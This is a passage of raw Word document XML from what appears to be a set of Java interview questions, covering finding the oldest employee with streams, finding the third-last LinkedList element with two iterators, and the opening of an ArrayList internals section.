          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>max()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to find the employee with the highest age.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063B7D5E" w14:textId="77777777" w:rsidR="0063317D" w:rsidRPr="00CE4B95" w:rsidRDefault="0063317D" w:rsidP="002A38E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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arator.comparingInt(Employee::getAge)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> compares the employees based on their age.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33453E3D" w14:textId="77777777" w:rsidR="0063317D" w:rsidRPr="00CE4B95" w:rsidRDefault="0063317D" w:rsidP="002A38E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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rElse(null)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ensures that if the list is empty, we return null instead of throwing an exception.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027181C1" w14:textId="77777777" w:rsidR="0063317D" w:rsidRPr="00CE4B95" w:rsidRDefault="0063317D" w:rsidP="002A38E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p w14:paraId="578B898D" w14:textId="77777777" w:rsidR="0063317D" w:rsidRPr="00CE4B95" w:rsidRDefault="0063317D" w:rsidP="002A38E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oldest employee is: Employee{name='Charlie', age=40}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F28C829" w14:textId="77777777" w:rsidR="0063317D" w:rsidRPr="00CE4B95" w:rsidRDefault="0063317D" w:rsidP="002A38E1">
      <w:pPr>
        <w:jc w:val="both"/>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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This solution efficiently compares the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of employees and retrieves the one with the highest age.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D30BE94" w14:textId="5EB15FCF"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F0CF21E">
          <v:rect id="_x0000_i1496" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B71A5D" w14:textId="77777777" w:rsidR="00943AB3" w:rsidRPr="00CE4B95" w:rsidRDefault="00943AB3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="152" w:name="_Toc196307632"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How will you find the 3rd last element from the linked list in a single iteration?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="152"/>
    </w:p>
    <w:p w14:paraId="1D9FB6E7" w14:textId="56FF8209" w:rsidR="00BD0217" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD0217" w:rsidP="00B96FE3">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o find the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3rd last element</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from a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in a single iteration, you can use the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>two-pointer technique</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (also known as the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"tortoise and hare"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> method). The idea is to maintain two pointers, where the second pointer </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>starts after a fixed number of nodes (in this case, 3 nodes), and then both pointers move together until the second pointer reaches the end of the list. At that point, the first pointer will be at the 3rd last element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133880DB"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s how you can achieve this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B4093A" w14:textId="77777777" w:rsidR="00BD0217" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD0217" w:rsidP="00B96FE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lgorithm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD2F4B4" w14:textId="77777777" w:rsidR="00BD0217" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD0217" w:rsidP="00B96FE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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itialize two pointers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A024FF7" w14:textId="77777777" w:rsidR="00BD0217" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD0217" w:rsidP="00B96FE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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rst</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pointer starts from the head of the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C2A7E0" w14:textId="77777777" w:rsidR="00BD0217" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD0217" w:rsidP="00B96FE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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cond</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pointer starts from the head but is moved </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3 steps ahead</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AEFA7E" w14:textId="77777777" w:rsidR="00BD0217" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD0217" w:rsidP="00B96FE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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ove both pointers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> together one step at a time, until the second pointer reaches the end of the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECC7D81" w14:textId="77777777" w:rsidR="00BD0217" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD0217" w:rsidP="00B96FE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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first</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pointer will then point to the 3rd last element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F78D84" w14:textId="77777777" w:rsidR="00BD0217" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD0217" w:rsidP="00B96FE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de Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FCB7A6"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nkedList;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1E4C11" w14:textId="77777777" w:rsidR="00BD0217" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD0217" w:rsidP="00B96FE3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B59368A"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588E2A77"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61000B71"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ing a LinkedList</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C3E3B0"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nkedList&lt;Integer&gt; list = new LinkedList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B02B785"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10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42474853"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20);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AE7E48"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30);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182F59BD"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40);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B92695F"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50);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE146D0"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F668994"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lling the function to find 3rd last element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB8E1E2"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eger thirdLast = findThirdLastElement(list);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBE8340"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DBE1AAB"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Output the result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31120C08"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thirdLast != null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6456C4"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The 3rd last element is: " + thirdLast);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50615819"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else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417D8814"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List is too small to have a 3rd last element.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DA4EAC"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D08C312"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4307849" w14:textId="77777777" w:rsidR="00BD0217" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD0217" w:rsidP="00B96FE3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42834DD4"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Function to find the 3rd last element in a LinkedList</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424D9887"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Integer findThirdLastElement(LinkedList&lt;Integer&gt; list) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E15D11"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list == null || list.size() &lt; 3) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BC2FD7"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null;  // Return null if the list has less than 3 elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B841CB4"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64DF7D0" w14:textId="77777777" w:rsidR="00BD0217" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD0217" w:rsidP="00B96FE3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1828B8E9"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e two pointers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4A8E05"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ar first = list.iterator();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60374BAD"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ar second = list.iterator();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445F2169" w14:textId="77777777" w:rsidR="00BD0217" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD0217" w:rsidP="00B96FE3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="109192C3"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Move the second pointer 3 steps ahead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB7FF9B"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or (int i = 0; i &lt; 3; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD5C310"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second.hasNext()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA909EA"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cond.next();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EE2C54"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6274F96"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D24E264" w14:textId="77777777" w:rsidR="00BD0217" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD0217" w:rsidP="00B96FE3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B0DF950"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Now move both pointers until second reaches the end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02222385"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hile (second.hasNext()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B9544B"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rst.next();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE3BD2E"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cond.next();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDD68E7"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20E1B91" w14:textId="77777777" w:rsidR="00BD0217" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD0217" w:rsidP="00B96FE3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0244659E"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 The first pointer will now be at the 3rd last element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FB0D02"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first.next();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2EB874"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16729DB"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DBDB02B" w14:textId="77777777" w:rsidR="00BD0217" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD0217" w:rsidP="00B96FE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011C33E6" w14:textId="77777777" w:rsidR="00BD0217" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD0217" w:rsidP="00B96FE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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itialization</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FF9C9A" w14:textId="77777777" w:rsidR="00BD0217" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD0217" w:rsidP="00B96FE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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e use an </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>iterator</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to traverse the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Both </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>first</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second</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pointers are initialized with the iterator of the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36279391" w14:textId="77777777" w:rsidR="00BD0217" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD0217" w:rsidP="00B96FE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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dvance the second pointer by 3 steps</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2754FBEE" w14:textId="77777777" w:rsidR="00BD0217" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD0217" w:rsidP="00B96FE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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e move the second pointer 3 steps ahead so that when it reaches the end of the list, the first pointer will be exactly at the 3rd last element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025197F5" w14:textId="77777777" w:rsidR="00BD0217" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD0217" w:rsidP="00B96FE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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ove both pointers simultaneously</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3F31DA" w14:textId="77777777" w:rsidR="00BD0217" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD0217" w:rsidP="00B96FE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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fter the second pointer is 3 steps ahead, we move both pointers one step at a time. When the second pointer reaches the end of the list, the first pointer will be at the 3rd last element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0668333F" w14:textId="77777777" w:rsidR="00BD0217" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD0217" w:rsidP="00B96FE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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turn the 3rd last element</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6682A118" w14:textId="77777777" w:rsidR="00BD0217" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD0217" w:rsidP="00B96FE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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fter the loop, the first pointer points to the 3rd last element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6B122D" w14:textId="77777777" w:rsidR="00BD0217" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD0217" w:rsidP="00B96FE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p w14:paraId="72A516DF"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3rd last element is: 30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426B50A3" w14:textId="77777777" w:rsidR="00BD0217" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD0217" w:rsidP="00B96FE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ime Complexity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A015F26" w14:textId="77777777" w:rsidR="00BD0217" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD0217" w:rsidP="00B96FE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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where </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the number of elements in the list. The list is traversed only once, so it’s efficient for large lists.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11ABF7CB" w14:textId="77777777" w:rsidR="00BD0217" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD0217" w:rsidP="00B96FE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pace Complexity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4DE910" w14:textId="77777777" w:rsidR="00BD0217" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD0217" w:rsidP="00B96FE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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as we are using only two pointers and no extra space other than the input list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F2B4C7" w14:textId="77777777" w:rsidR="00BD0217" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD0217" w:rsidP="00B96FE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is approach allows you to find the 3rd last element in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>one iteration</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> through the list, making it efficient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453DA889" w14:textId="5B5584CA"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51615F8">
          <v:rect id="_x0000_i1497" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F23673" w14:textId="77777777" w:rsidR="00E67980" w:rsidRPr="00CE4B95" w:rsidRDefault="00E67980">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="153" w:name="_Toc196307633"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How does ArrayList internally work?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="153"/>
    </w:p>
    <w:p w14:paraId="05AFA4EF" w14:textId="2374E543" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5ACF">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n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in Java is part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java Collections Framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
